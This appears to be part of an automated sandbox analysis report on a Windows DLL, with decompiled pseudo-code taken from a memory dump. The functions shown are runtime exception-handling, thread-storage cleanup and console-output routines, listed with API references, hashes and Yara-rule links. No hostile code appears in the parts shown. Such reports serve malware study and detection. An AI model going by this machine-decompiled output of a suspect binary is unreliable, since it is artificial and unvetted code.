													_t210 = _t210 + 2;
													__eflags = _t278;
													if(_t278 != 0) {
														continue;
													} else {
														goto L96;
													}
												}
											}
											L98:
											__eflags = _t211;
											if(_t211 == 0) {
												goto L100;
											} else {
												_t208 = 0;
											}
											goto L109;
										}
										asm("sbb eax, eax");
										_t211 = _t210 | 0x00000001;
										__eflags = _t211;
										goto L98;
									}
								} else {
									__eflags =  *_t308 & 0x00000010;
									if(( *_t308 & 0x00000010) != 0) {
										goto L108;
									} else {
										goto L90;
									}
								}
							}
						}
						L109:
						return _t208;
					}
				} else {
					_t274 = _a4;
					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
						L22:
						_t300 = _a12;
						_v8 = _t300;
						goto L24;
					} else {
						_t319 = 0;
						if(_t274[0x1c] != 0) {
							goto L22;
						} else {
							_t225 = E6E44CCF1(_t274, _t279, _t300, _t305, 0);
							if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
								L60:
								return _t225;
							} else {
								_t274 =  *(E6E44CCF1(_t274, _t279, _t300, _t305, 0) + 0x10);
								_t263 = E6E44CCF1(_t274, _t279, _t300, _t305, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t263 + 0x14));
								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t319) {
									goto L66;
								} else {
									if( *((intOrPtr*)(E6E44CCF1(_t274, _t279, _t300, _t305, _t319) + 0x1c)) == _t319) {
										L23:
										_t300 = _v8;
										_t279 = _v12;
										L24:
										_v52 = _t305;
										_v48 = 0;
										__eflags =  *_t274 - 0xe06d7363;
										if( *_t274 != 0xe06d7363) {
											L56:
											__eflags = _t305[3];
											if(_t305[3] <= 0) {
												goto L59;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L66;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t279);
													_push(_t305);
													_push(_a16);
													_push(_t300);
													_push(_a8);
													_push(_t274);
													L67();
													_t335 = _t335 + 0x20;
													goto L59;
												}
											}
										} else {
											__eflags = _t274[0x10] - 3;
											if(_t274[0x10] != 3) {
												goto L56;
											} else {
												__eflags = _t274[0x14] - 0x19930520;
												if(_t274[0x14] == 0x19930520) {
													L29:
													_t319 = _a32;
													__eflags = _t305[3];
													if(_t305[3] > 0) {
														_push(_a28);
														E6E44C46A(_t274, _t279, _t305, _t319,  &_v68,  &_v52, _t279, _a16, _t305);
														_t300 = _v64;
														_t335 = _t335 + 0x18;
														_t250 = _v68;
														_v44 = _t250;
														_v16 = _t300;
														__eflags = _t300 - _v56;
														if(_t300 < _v56) {
															_t294 = _t300 * 0x14;
															__eflags = _t294;
															_v32 = _t294;
															do {
																_t295 = 5;
																_t253 = memcpy( &_v104,  *((intOrPtr*)( *_t250 + 0x10)) + _t294, _t295 << 2);
																_t335 = _t335 + 0xc;
																__eflags = _v104 - _t253;
																if(_v104 <= _t253) {
																	__eflags = _t253 - _v100;
																	if(_t253 <= _v100) {
																		_t298 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t255 =  *(_t274[0x1c] + 0xc);
																			_t303 =  *_t255;
																			_t256 =  &(_t255[1]);
																			__eflags = _t256;
																			_v36 = _t256;
																			_t257 = _v88;
																			_v40 = _t303;
																			_v24 = _t257;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t318 = _v36;
																				_t330 = _t303;
																				__eflags = _t330;
																				if(_t330 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t274[0x1c]);
																						_t258 =  &_v84;
																						_push( *_t318);
																						_push(_t258);
																						L86();
																						_t335 = _t335 + 0xc;
																						__eflags = _t258;
																						if(_t258 != 0) {
																							break;
																						}
																						_t330 = _t330 - 1;
																						_t318 = _t318 + 4;
																						__eflags = _t330;
																						if(_t330 > 0) {
																							continue;
																						} else {
																							_t298 = _v20;
																							_t257 = _v24;
																							_t303 = _v40;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E6E44CFB6(_t303, _t274, _a8, _v8, _a16, _a20,  &_v84,  *_t318,  &_v104, _a28, _a32);
																					_t335 = _t335 + 0x30;
																				}
																				L43:
																				_t300 = _v16;
																				goto L44;
																				L40:
																				_t298 = _t298 + 1;
																				_t257 = _t257 + 0x10;
																				_v20 = _t298;
																				_v24 = _t257;
																				__eflags = _t298 - _v92;
																			} while (_t298 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t300 = _t300 + 1;
																_t250 = _v44;
																_t294 = _v32 + 0x14;
																_v16 = _t300;
																_v32 = _t294;
																__eflags = _t300 - _v56;
															} while (_t300 < _v56);
															_t305 = _a20;
															_t319 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E6E44CA71(_t274, _t305, _t319, __eflags);
														_t279 = _t274;
													}
													__eflags = ( *_t305 & 0x1fffffff) - 0x19930521;
													if(( *_t305 & 0x1fffffff) < 0x19930521) {
														L59:
														_t225 = E6E44CCF1(_t274, _t279, _t300, _t305, _t319);
														__eflags =  *(_t225 + 0x1c);
														if( *(_t225 + 0x1c) != 0) {
															goto L66;
														} else {
															goto L60;
														}
													} else {
														__eflags = _t305[7];
														if(_t305[7] != 0) {
															L52:
															_t229 = _t305[8] >> 2;
															__eflags = _t229 & 0x00000001;
															if((_t229 & 0x00000001) == 0) {
																_push(_t305[7]);
																_t230 = E6E44DA45(_t274, _t305, _t319, _t274);
																_pop(_t279);
																__eflags = _t230;
																if(_t230 == 0) {
																	goto L63;
																} else {
																	goto L59;
																}
															} else {
																 *(E6E44CCF1(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
																_t238 = E6E44CCF1(_t274, _t279, _t300, _t305, _t319);
																_t290 = _v8;
																 *((intOrPtr*)(_t238 + 0x14)) = _v8;
																goto L61;
															}
														} else {
															_t245 = _t305[8] >> 2;
															__eflags = _t245 & 0x00000001;
															if((_t245 & 0x00000001) == 0) {
																goto L59;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L59;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _t274[0x14] - 0x19930521;
													if(_t274[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t274[0x14] - 0x19930522;
														if(_t274[0x14] != 0x19930522) {
															goto L56;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E6E44CCF1(_t274, _t279, _t300, _t305, _t319) + 0x1c));
										_t268 = E6E44CCF1(_t274, _t279, _t300, _t305, _t319);
										_push(_v16);
										 *(_t268 + 0x1c) = _t319;
										_t269 = E6E44DA45(_t274, _t305, _t319, _t274);
										_pop(_t290);
										if(_t269 != 0) {
											goto L23;
										} else {
											_t305 = _v16;
											_t356 =  *_t305 - _t319;
											if( *_t305 <= _t319) {
												L61:
												E6E44F50C(_t274, _t290, _t300, _t305, _t319, __eflags);
											} else {
												while(1) {
													_t290 =  *((intOrPtr*)(_t319 + _t305[1] + 4));
													if(E6E44D6D9( *((intOrPtr*)(_t319 + _t305[1] + 4)), _t356, ?str?) != 0) {
														goto L62;
													}
													_t319 = _t319 + 0x10;
													_t273 = _v20 + 1;
													_v20 = _t273;
													_t356 = _t273 -  *_t305;
													if(_t273 >=  *_t305) {
														goto L61;
													} else {
														continue;
													}
													goto L62;
												}
											}
											L62:
											_push(1);
											_push(_t274);
											E6E44CA71(_t274, _t305, _t319, __eflags);
											_t279 =  &_v64;
											E6E44D6C1( &_v64);
											E6E44C29C( &_v64, 0x6e487f7c);
											L63:
											 *(E6E44CCF1(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
											_t232 = E6E44CCF1(_t274, _t279, _t300, _t305, _t319);
											_t279 = _v8;
											 *(_t232 + 0x14) = _v8;
											__eflags = _t319;
											if(_t319 == 0) {
												_t319 = _a8;
											}
											E6E44C65D(_t279, _t319, _t274);
											E6E44D945(_a8, _a16, _t305);
											_t235 = E6E44DB02(_t305);
											_t335 = _t335 + 0x10;
											_push(_t235);
											E6E44D8BC(_t274, _t279, _t300, _t305, _t319, __eflags);
											goto L66;
										}
									}
								}
							}
						}
					}
				}
			}

0x6e44d036
0x6e44d03d
0x6e44d03f
0x6e44d048
0x6e44d04e
0x6e44d056
0x6e44d058
0x6e44d05b
0x6e44d061
0x6e44d3da
0x6e44d3da
0x6e44d3df
0x6e44d3e1
0x6e44d3e3
0x6e44d3e6
0x6e44d3e7
0x6e44d3ea
0x6e44d3f0
0x6e44d50f
0x6e44d3f6
0x6e44d3f6
0x6e44d3f7
0x6e44d3f8
0x6e44d3ff
0x6e44d402
0x6e44d405
0x6e44d40b
0x6e44d40d
0x6e44d412
0x6e44d415
0x6e44d417
0x6e44d41d
0x6e44d41f
0x6e44d425
0x6e44d43a
0x6e44d43f
0x6e44d442
0x6e44d444
0x6e44d50b
0x00000000
0x6e44d50c
0x6e44d444
0x6e44d425
0x6e44d41d
0x6e44d415
0x6e44d44a
0x6e44d44d
0x6e44d450
0x6e44d453
0x6e44d456
0x6e44d45c
0x6e44d46e
0x6e44d473
0x6e44d476
0x6e44d479
0x6e44d47c
0x6e44d47f
0x6e44d482
0x6e44d485
0x00000000
0x00000000
0x6e44d48b
0x6e44d48b
0x6e44d48e
0x6e44d491
0x6e44d4a0
0x6e44d4a1
0x6e44d4a1
0x6e44d4a3
0x6e44d4a6
0x00000000
0x00000000
0x6e44d4a8
0x6e44d4ab
0x00000000
0x00000000
0x6e44d4b9
0x6e44d4bb
0x6e44d4be
0x6e44d4c0
0x6e44d4c8
0x6e44d4c8
0x6e44d4cb
0x6e44d4cd
0x6e44d4cf
0x6e44d4eb
0x6e44d4f0
0x6e44d4f3
0x6e44d4f3
0x00000000
0x6e44d4cb
0x6e44d4c2
0x6e44d4c6
0x00000000
0x00000000
0x00000000
0x6e44d4f6
0x6e44d4f9
0x6e44d4fa
0x6e44d4fd
0x6e44d500
0x6e44d503
0x6e44d506
0x6e44d506
0x00000000
0x6e44d491
0x6e44d510
0x6e44d515
0x6e44d516
0x6e44d519
0x6e44d51c
0x6e44d51d
0x6e44d51e
0x6e44d51f
0x6e44d522
0x6e44d524
0x6e44d59c
0x6e44d59e
0x6e44d59e
0x6e44d526
0x6e44d526
0x6e44d529
0x6e44d52c
0x00000000
0x6e44d52e
0x6e44d52e
0x6e44d531
0x6e44d534
0x6e44d53b
0x6e44d53b
0x6e44d53e
0x6e44d540
0x6e44d542
0x6e44d574
0x6e44d574
0x6e44d577
0x6e44d57e
0x6e44d57e
0x6e44d581
0x6e44d584
0x6e44d58b
0x6e44d58b
0x6e44d58e
0x6e44d595
0x6e44d597
0x6e44d597
0x6e44d590
0x6e44d590
0x6e44d593
0x00000000
0x00000000
0x6e44d593
0x6e44d586
0x6e44d586
0x6e44d589
0x00000000
0x00000000
0x6e44d589
0x6e44d579
0x6e44d579
0x6e44d57c
0x00000000
0x00000000
0x6e44d57c
0x6e44d598
0x6e44d544
0x6e44d544
0x6e44d544
0x6e44d547
0x6e44d547
0x6e44d549
0x6e44d54b
0x00000000
0x00000000
0x6e44d54d
0x6e44d54f
0x6e44d563
0x6e44d563
0x6e44d551
0x6e44d551
0x6e44d554
0x6e44d557
0x00000000
0x6e44d559
0x6e44d559
0x6e44d55c
0x6e44d55f
0x6e44d561
0x00000000
0x00000000
0x00000000
0x00000000
0x6e44d561
0x6e44d557
0x6e44d56c
0x6e44d56c
0x6e44d56e
0x00000000
0x6e44d570
0x6e44d570
0x6e44d570
0x00000000
0x6e44d56e
0x6e44d567
0x6e44d569
0x6e44d569
0x00000000
0x6e44d569
0x6e44d536
0x6e44d536
0x6e44d539
0x00000000
0x00000000
0x00000000
0x00000000
0x6e44d539
0x6e44d534
0x6e44d52c
0x6e44d59f
0x6e44d5a3
0x6e44d5a3
0x6e44d070
0x6e44d070
0x6e44d079
0x6e44d176
0x6e44d176
0x6e44d179
0x00000000
0x6e44d0a8
0x6e44d0a8
0x6e44d0ad
0x00000000
0x6e44d0b3
0x6e44d0b3
0x6e44d0bb
0x6e44d374
0x6e44d378
0x6e44d0c1
0x6e44d0c6
0x6e44d0c9
0x6e44d0ce
0x6e44d0d5
0x6e44d0da
0x00000000
0x6e44d112
0x6e44d11a
0x6e44d17e
0x6e44d17e
0x6e44d181
0x6e44d184
0x6e44d186
0x6e44d189
0x6e44d18c
0x6e44d192
0x6e44d343
0x6e44d343
0x6e44d346
0x00000000
0x6e44d348
0x6e44d348
0x6e44d34b
0x00000000
0x6e44d351
0x6e44d351
0x6e44d354
0x6e44d357
0x6e44d358
0x6e44d359
0x6e44d35c
0x6e44d35d
0x6e44d360
0x6e44d361
0x6e44d366
0x00000000
0x6e44d366
0x6e44d34b
0x6e44d198
0x6e44d198
0x6e44d19c
0x00000000
0x6e44d1a2
0x6e44d1a2
0x6e44d1a9
0x6e44d1c1
0x6e44d1c1
0x6e44d1c4
0x6e44d1c7
0x6e44d1cd
0x6e44d1dd
0x6e44d1e2
0x6e44d1e5
0x6e44d1e8
0x6e44d1eb
0x6e44d1ee
0x6e44d1f1
0x6e44d1f4
0x6e44d1fa
0x6e44d1fa
0x6e44d1fd
0x6e44d200
0x6e44d20f
0x6e44d210
0x6e44d210
0x6e44d212
0x6e44d215
0x6e44d21b
0x6e44d21e
0x6e44d224
0x6e44d226
0x6e44d229
0x6e44d22c
0x6e44d235
0x6e44d238
0x6e44d23a
0x6e44d23a
0x6e44d23d
0x6e44d240
0x6e44d243
0x6e44d246
0x6e44d249
0x6e44d24e
0x6e44d24f
0x6e44d250
0x6e44d251
0x6e44d252
0x6e44d255
0x6e44d257
0x6e44d259
0x00000000
0x6e44d25b
0x6e44d25b
0x6e44d25b
0x6e44d25e
0x6e44d261
0x6e44d263
0x6e44d264
0x6e44d269
0x6e44d26c
0x6e44d26e
0x00000000
0x00000000
0x6e44d270
0x6e44d271
0x6e44d274
0x6e44d276
0x00000000
0x6e44d278
0x6e44d278
0x6e44d27b
0x6e44d27e
0x00000000
0x6e44d27e
0x00000000
0x6e44d276
0x6e44d292
0x6e44d298
0x6e44d2b5
0x6e44d2ba
0x6e44d2ba
0x6e44d2bd
0x6e44d2bd
0x00000000
0x6e44d281
0x6e44d281
0x6e44d282
0x6e44d285
0x6e44d288
0x6e44d28b
0x6e44d28b
0x00000000
0x6e44d290
0x6e44d22c
0x6e44d21e
0x6e44d2c0
0x6e44d2c3
0x6e44d2c4
0x6e44d2c7
0x6e44d2ca
0x6e44d2cd
0x6e44d2d0
0x6e44d2d0
0x6e44d2d9
0x6e44d2dc
0x6e44d2dc
0x6e44d1f4
0x6e44d2df
0x6e44d2e3
0x6e44d2e5
0x6e44d2e8
0x6e44d2ee
0x6e44d2ee
0x6e44d2f6
0x6e44d2fb
0x6e44d369
0x6e44d369
0x6e44d36e
0x6e44d372
0x00000000
0x00000000
0x00000000
0x00000000
0x6e44d2fd
0x6e44d2fd
0x6e44d301
0x6e44d313
0x6e44d316
0x6e44d319
0x6e44d31b
0x6e44d332
0x6e44d336
0x6e44d33c
0x6e44d33d
0x6e44d33f
0x00000000
0x6e44d341
0x00000000
0x6e44d341
0x6e44d31d
0x6e44d322
0x6e44d325
0x6e44d32a
0x6e44d32d
0x00000000
0x6e44d32d
0x6e44d303
0x6e44d306
0x6e44d309
0x6e44d30b
0x00000000
0x6e44d30d
0x6e44d30d
0x6e44d311
0x00000000
0x00000000
0x00000000
0x00000000
0x6e44d311
0x6e44d30b
0x6e44d301
0x6e44d1ab
0x6e44d1ab
0x6e44d1b2
0x00000000
0x6e44d1b4
0x6e44d1b4
0x6e44d1bb
0x00000000
0x00000000
0x00000000
0x00000000
0x6e44d1bb
0x6e44d1b2
0x6e44d1a9
0x6e44d19c
0x6e44d11c
0x6e44d124
0x6e44d127
0x6e44d12c
0x6e44d130
0x6e44d133
0x6e44d139
0x6e44d13c
0x00000000
0x6e44d13e
0x6e44d13e
0x6e44d141
0x6e44d143
0x6e44d379
0x6e44d379
0x00000000
0x6e44d149
0x6e44d151
0x6e44d15c
0x00000000
0x00000000
0x6e44d165
0x6e44d168
0x6e44d169
0x6e44d16c
0x6e44d16e
0x00000000
0x6e44d174
0x00000000
0x6e44d174
0x00000000
0x6e44d16e
0x6e44d149
0x6e44d37e
0x6e44d37e
0x6e44d380
0x6e44d381
0x6e44d388
0x6e44d38b
0x6e44d399
0x6e44d39e
0x6e44d3a3
0x6e44d3a6
0x6e44d3ab
0x6e44d3ae
0x6e44d3b1
0x6e44d3b3
0x6e44d3b5
0x6e44d3b5
0x6e44d3ba
0x6e44d3c6
0x6e44d3cc
0x6e44d3d1
0x6e44d3d4
0x6e44d3d5
0x00000000
0x6e44d3d5
0x6e44d13c
0x6e44d11a
0x6e44d0da
0x6e44d0bb
0x6e44d0ad
0x6e44d079

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 6E44D133
type_info::operator==.LIBVCRUNTIME ref: 6E44D155
___TypeMatch.LIBVCRUNTIME ref: 6E44D264
IsInExceptionSpec.LIBVCRUNTIME ref: 6E44D336
_UnwindNestedFrames.LIBCMT ref: 6E44D3BA
CallUnexpected.LIBVCRUNTIME ref: 6E44D3D5

Strings

csm, xrefs: 6E44D0E0
csm, xrefs: 6E44D18C
|$Hn, xrefs: 6E44D14C
csm, xrefs: 6E44D073

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm$|$Hn
API String ID: 2123188842-325490382
Opcode ID: 3bf8d54c339ab3b23c6c72a82aac8d9ef7d95ac460086d5e3cf51d0c21c2fc6f
Instruction ID: 18ba314721c5316c3b40ecacf1e5f01e409b47c6644ac99800f2515cddf07d8e
Opcode Fuzzy Hash: 3bf8d54c339ab3b23c6c72a82aac8d9ef7d95ac460086d5e3cf51d0c21c2fc6f
Instruction Fuzzy Hash: 0AB13175A0020AEFEF15CFE4C990D9EBBB9FF48314B14455AE811AB255D330EA51CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E43C500, Relevance: 12.6, APIs: 10, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E6E43C500() {
				intOrPtr _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t28;
				void* _t29;
				void* _t30;
				void* _t31;
				signed char _t42;
				signed char _t43;
				signed char _t44;
				signed char _t45;
				intOrPtr* _t52;
				intOrPtr* _t53;
				intOrPtr* _t54;
				intOrPtr* _t55;
				intOrPtr* _t56;
				void* _t57;

				_t25 =  *((intOrPtr*)(_t57 + 0x18));
				if(_t25 == 3 || _t25 == 0) {
					_t52 =  *0x6e48adcc; // 0x0
					if(_t52 == 0) {
						goto L26;
					}
					_t42 = 0;
					do {
						_t27 = TlsGetValue( *(_t52 + 4));
						if(_t27 != 0) {
							TlsSetValue( *(_t52 + 4), 0);
							 *_t52(_t27);
							_t57 = _t57 + 4;
							_t42 = 1;
						}
						_t52 =  *((intOrPtr*)(_t52 + 8));
					} while (_t52 != 0);
					if((_t42 & 0x00000001) == 0) {
						goto L26;
					}
					_t53 =  *0x6e48adcc; // 0x0
					if(_t53 == 0) {
						goto L26;
					}
					_t43 = 0;
					do {
						_t28 = TlsGetValue( *(_t53 + 4));
						if(_t28 != 0) {
							TlsSetValue( *(_t53 + 4), 0);
							 *_t53(_t28);
							_t57 = _t57 + 4;
							_t43 = 1;
						}
						_t53 =  *((intOrPtr*)(_t53 + 8));
					} while (_t53 != 0);
					if((_t43 & 0x00000001) == 0) {
						goto L26;
					}
					_t54 =  *0x6e48adcc; // 0x0
					if(_t54 == 0) {
						goto L26;
					}
					_t44 = 0;
					do {
						_t29 = TlsGetValue( *(_t54 + 4));
						if(_t29 != 0) {
							TlsSetValue( *(_t54 + 4), 0);
							 *_t54(_t29);
							_t57 = _t57 + 4;
							_t44 = 1;
						}
						_t54 =  *((intOrPtr*)(_t54 + 8));
					} while (_t54 != 0);
					if((_t44 & 0x00000001) == 0) {
						goto L26;
					}
					_t55 =  *0x6e48adcc; // 0x0
					if(_t55 == 0) {
						goto L26;
					}
					_t45 = 0;
					do {
						_t30 = TlsGetValue( *(_t55 + 4));
						if(_t30 != 0) {
							TlsSetValue( *(_t55 + 4), 0);
							 *_t55(_t30);
							_t57 = _t57 + 4;
							_t45 = 1;
						}
						_t55 =  *((intOrPtr*)(_t55 + 8));
					} while (_t55 != 0);
					if((_t45 & 0x00000001) != 0) {
						_t56 =  *0x6e48adcc; // 0x0
						while(_t56 != 0) {
							_t31 = TlsGetValue( *(_t56 + 4));
							if(_t31 != 0) {
								TlsSetValue( *(_t56 + 4), 0);
								 *_t56(_t31);
								_t57 = _t57 + 4;
							}
							_t56 =  *((intOrPtr*)(_t56 + 8));
						}
					}
					goto L26;
				} else {
					L26:
					_t26 =  *0x6e487100; // 0x70
					return _t26;
				}
			}

0x6e43c504
0x6e43c50b
0x6e43c515
0x6e43c51d
0x00000000
0x00000000
0x6e43c529
0x6e43c537
0x6e43c53a
0x6e43c53e
0x6e43c547
0x6e43c54e
0x6e43c551
0x6e43c554
0x6e43c554
0x6e43c530
0x6e43c533
0x6e43c55b
0x00000000
0x00000000
0x6e43c561
0x6e43c569
0x00000000
0x00000000
0x6e43c56f
0x6e43c587
0x6e43c58a
0x6e43c58e
0x6e43c597
0x6e43c59e
0x6e43c5a1
0x6e43c5a4
0x6e43c5a4
0x6e43c580
0x6e43c583
0x6e43c5ab
0x00000000
0x00000000
0x6e43c5b1
0x6e43c5b9
0x00000000
0x00000000
0x6e43c5bb
0x6e43c5c7
0x6e43c5ca
0x6e43c5ce
0x6e43c5d7
0x6e43c5de
0x6e43c5e1
0x6e43c5e4
0x6e43c5e4
0x6e43c5c0
0x6e43c5c3
0x6e43c5eb
0x00000000
0x00000000
0x6e43c5ed
0x6e43c5f5
0x00000000
0x00000000
0x6e43c5f7
0x6e43c607
0x6e43c60a
0x6e43c60e
0x6e43c617
0x6e43c61e
0x6e43c621
0x6e43c624
0x6e43c624
0x6e43c600
0x6e43c603
0x6e43c62b
0x6e43c639
0x6e43c644
0x6e43c64b
0x6e43c64f
0x6e43c658
0x6e43c65f
0x6e43c662
0x6e43c662
0x6e43c641
0x6e43c641
0x6e43c644
0x00000000
0x6e43c62d
0x6e43c62d
0x6e43c62d
0x6e43c636
0x6e43c636

APIs

TlsGetValue.KERNEL32 ref: 6E43C53A
TlsSetValue.KERNEL32(?,00000000), ref: 6E43C547
TlsGetValue.KERNEL32 ref: 6E43C58A
TlsSetValue.KERNEL32(?,00000000), ref: 6E43C597
TlsGetValue.KERNEL32 ref: 6E43C5CA
TlsSetValue.KERNEL32(?,00000000), ref: 6E43C5D7
TlsGetValue.KERNEL32 ref: 6E43C60A
TlsSetValue.KERNEL32(?,00000000), ref: 6E43C617
TlsGetValue.KERNEL32 ref: 6E43C64B
TlsSetValue.KERNEL32(?,00000000), ref: 6E43C658

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: b3d1f385ee72a848d281f1621a8243e132371c069089d35a75a0eccedf839330
Instruction ID: 4df2a1f78c1e430ae1d10213f0e5451c7c9f6bc06b9b63c8bf165688533c290b
Opcode Fuzzy Hash: b3d1f385ee72a848d281f1621a8243e132371c069089d35a75a0eccedf839330
Instruction Fuzzy Hash: E041E372244379EFDB406FF6AC10F9A3764AF4A350F245026EE108E341E7A1CA11DBB1

Uniqueness

Uniqueness Score: -1.00%

Function 6E441DA0, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 212
fileCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E6E441DA0(void* __ebx, struct _OVERLAPPED** __ecx, void* __edx, void* __edi, void* __ebp, signed char _a4, signed char* _a8) {
				char _v20;
				void* _v24;
				char _v44;
				long _v48;
				void* _v52;
				signed int _v56;
				char _v60;
				void* __esi;
				long _t57;
				void* _t58;
				long _t60;
				signed int _t61;
				long _t81;
				signed int _t86;
				signed int _t87;
				signed int _t88;
				signed int _t91;
				char _t93;
				void* _t96;
				void* _t97;
				signed int _t100;
				signed int _t101;
				struct _OVERLAPPED* _t102;
				signed int _t105;
				signed int* _t106;
				signed int _t110;
				signed char _t112;
				void* _t114;
				long _t118;
				void** _t119;
				void* _t120;
				long _t122;
				void* _t125;
				void* _t133;
				struct _OVERLAPPED** _t135;
				void* _t144;
				long _t152;
				signed char* _t155;
				DWORD* _t156;
				void* _t157;
				void** _t158;
				void** _t160;

				_push(__ebp);
				_push(__ebx);
				_push(__edi);
				_t158 = _t157 - 0x30;
				_t152 = _a4;
				_t135 = __ecx;
				if(_t152 == 0) {
					 *(__ecx + 4) = 0;
					goto L5;
				} else {
					_t96 = __edx;
					_t58 = GetStdHandle(0xfffffff4);
					if(_t58 == 0) {
						_t57 = 6;
						goto L7;
					} else {
						_t133 = _t58;
						if(_t58 != 0xffffffff) {
							_v48 = 0;
							_t60 = GetConsoleMode(_t133,  &_v48);
							__eflags = _t60;
							if(_t60 == 0) {
								__eflags = _t133;
								if(__eflags == 0) {
									goto L42;
								} else {
									_v48 = 0;
									_t81 = WriteFile(_t133, _t96, _t152,  &_v48, 0);
									__eflags = _t81;
									if(_t81 == 0) {
										_t57 = GetLastError();
										_t102 = 0;
										__eflags = 0;
										_t122 = 1;
									} else {
										_t102 = _v48;
										_t57 = 0;
										_t122 = 0;
									}
									 *_t135 = _t122;
									_t135[1] = _t102;
									_t135[2] = _t57;
									goto L9;
								}
							} else {
								_t57 = _a8[4] & 0x000000ff;
								__eflags = _t57;
								if(_t57 == 0) {
									__eflags = _t152 - 0x1000;
									_t84 =  <  ? _t152 : 0x1000;
									_push( <  ? _t152 : 0x1000);
									E6E433820( &_v60, _t96);
									_t158 =  &(_t158[1]);
									__eflags = _v60 - 1;
									if(_v60 != 1) {
										_t86 = _v56;
										_t97 = _v52;
										goto L28;
									} else {
										__eflags = _v56;
										if(_v56 == 0) {
											_t87 =  *_t96 & 0x000000ff;
											_t38 = _t87 + 0x6e47cd60; // 0x1010101
											_t105 =  *_t38 & 0x000000ff;
											__eflags = _t105 - 2;
											if(_t105 < 2) {
												L39:
												_t135[2] = 0x6e47e0bc;
												_t135[1] = 0x1502;
												goto L40;
											} else {
												__eflags = _t105 - _t152;
												if(_t105 <= _t152) {
													goto L39;
												} else {
													_t106 = _a8;
													 *_t106 = _t87;
													_t106[1] = 1;
													goto L38;
												}
											}
											goto L9;
										} else {
											_t88 = _v56;
											__eflags = _t88 - _t152;
											if(__eflags > 0) {
												_t100 = _t88;
												_t118 = _t152;
												_push(0x6e47e0f4);
												goto L45;
											} else {
												_t125 = _t96;
												_push(_t88);
												E6E433820( &_v48, _t125);
												_t158 =  &(_t158[1]);
												_t86 = L6E4428E0(_t96,  &_v48, _t133, _t135);
												_t97 = _t125;
												L28:
												_push(_t97);
												_push(_t86);
												_t57 = L6E442620(_t97, _t135, _t133, _t133, _t135);
												_t158 =  &(_t158[2]);
												goto L9;
											}
										}
									}
								} else {
									__eflags = _t57 - 4;
									if(_t57 >= 4) {
										E6E4572E0("Unexpected number of bytes for incomplete UTF-8 codepoint.C:eodllautblkklahmhgnetilzvvcslfjwakfzrpeciobxpylgwrokyyfkblnopnjvhlcoxjbvrndpaoezowltgjwguuqlcjtinialvpbtfcixalgwrcjcrthjdwukfjvq", 0x3a, 0x6e47e05c);
										_t158 =  &(_t158[1]);
										asm("ud2");
										L42:
										_t61 = E6E456E20(_t96,  &M6E47D3AA, 0x23, _t133, _t135, __eflags, 0x6e47d454);
										_t158 =  &(_t158[1]);
										asm("ud2");
										goto L43;
									} else {
										_t110 =  *_t96;
										_t155 = _a8;
										__eflags = (_t110 & 0x000000c0) - 0x80;
										if((_t110 & 0x000000c0) != 0x80) {
											_a4 = 0;
											goto L24;
										} else {
											_t155[_t57] = _t110;
											_t112 = _a4 + 1;
											_a4 = _t112;
											_t57 =  *_t155 & 0x000000ff;
											_t96 =  *(_t57 + 0x6e47cd60) & 0x000000ff;
											__eflags = _t96 - _t112;
											_v24 = _t96;
											if(_t96 <= _t112) {
												_t61 = _t112 & 0x000000ff;
												__eflags = _t112 - 5;
												if(__eflags >= 0) {
													L43:
													_t100 = _t61;
													_t118 = 4;
													_push(0x6e47e0c4);
													L45:
													E6E456DB0(_t96, _t100, _t118, _t133, _t135, __eflags);
													_t160 =  &(_t158[1]);
													asm("ud2");
													goto L46;
												} else {
													_push(_t61);
													_t57 = E6E433820( &_v60, _t155);
